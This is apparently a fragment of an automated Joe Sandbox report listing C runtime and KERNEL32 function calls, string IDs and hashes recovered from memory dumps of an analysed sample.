                                                      • __lock.LIBCMT ref: 00414366
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414383
                                                      • InterlockedIncrement.KERNEL32(02211670), ref: 004143AE
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 4271482742-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00402780: std::locale::locale.LIBCPMTD ref: 00402791
                                                        • Part of subcall function 00405C90: std::_Lockit::_Lockit.LIBCPMT ref: 00405C9B
                                                        • Part of subcall function 00405C90: int.LIBCPMTD ref: 00405CAD
                                                        • Part of subcall function 00405C90: std::locale::_Getfacet.LIBCPMTD ref: 00405CBC
                                                        • Part of subcall function 004026D0: std::locale::facet::_Decref.LIBCPMTD ref: 004026E6
                                                      • _memmove_s.LIBCMT ref: 00405445
                                                      • std::ios_base::width.LIBCPMTD ref: 004055B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: DecrefGetfacetLockitLockit::__memmove_sstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                      • String ID: @$tD@
                                                      • API String ID: 3492058185-11574304
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Fputc$H_prolog3_
                                                      • String ID:
                                                      • API String ID: 2569218679-3916222277
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: swprintf
                                                      • String ID: $$$$l
                                                      • API String ID: 233258989-1469801561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: swprintf
                                                      • String ID: $$$$l
                                                      • API String ID: 233258989-1469801561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040821B), ref: 0040F055
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040F065
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004078DB
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004078F8
                                                        • Part of subcall function 0040784D: std::runtime_error::runtime_error.LIBCPMT ref: 00407858
                                                      • __CxxThrowException@8.LIBCMT ref: 00407906
                                                        • Part of subcall function 0040898B: RaiseException.KERNEL32(?,?,0040A2C1,00403EC3,?,?,?,?,0040A2C1,00403EC3,00422E30,0047C638,00403EC3,00000000,00000000), ref: 004089CD
                                                      Strings
                                                      • invalid string position, xrefs: 004078E0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                      • String ID: invalid string position
                                                      • API String ID: 3299838469-1799206989
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00406C8F
                                                      • _fgetc.LIBCMT ref: 00406DC5
                                                        • Part of subcall function 004057C0: std::_String_base::_Xlen.LIBCPMT ref: 004057DA
                                                      • _memcpy_s.LIBCMT ref: 00406D8A
                                                      • _ungetc.LIBCMT ref: 00406E10
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                      • String ID:
                                                      • API String ID: 9762108-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041825C
                                                      • __isleadbyte_l.LIBCMT ref: 00418290
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00411001,?,00000000,00000000,?,?,?,?,00411001,00000000,?), ref: 004182C1
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00411001,00000001,00000000,00000000,?,?,?,?,00411001,00000000,?), ref: 0041832F
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 3b948e6817b72b12b4334545890c1915b0aaf1950ae015847cc768e79634f568
                                                      • Instruction ID: 74007f69de2bab3946e377790a4a8f287d31041a30969490a9c96c42d01eff20
                                                      • Opcode Fuzzy Hash: 3b948e6817b72b12b4334545890c1915b0aaf1950ae015847cc768e79634f568
                                                      • Instruction Fuzzy Hash: 4B31BF31A00645EFCF22DFA4C8849FE3BA5AF02310B1849AEE4659B291DB34DD81DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408845
                                                        • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408855
                                                      • __getptd.LIBCMT ref: 0040BB36
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __getptd.LIBCMT ref: 0040BB44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                      • String ID: csm
                                                      • API String ID: 803148776-1018135373
                                                      • Opcode ID: c28711abf6c04238348f1cf2008a3eb01f2e0dea84089cfe500ac4074473000b
                                                      • Instruction ID: 21e0c6e43c4f5b58ed6336fa1e07c5e3332ec40426277922b29aebc454435a62
                                                      • Opcode Fuzzy Hash: c28711abf6c04238348f1cf2008a3eb01f2e0dea84089cfe500ac4074473000b
                                                      • Instruction Fuzzy Hash: 330128358017058BDF24AF22C444AAEBBB5EF10311F54493FE44176AD6CB3DA985DA8D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%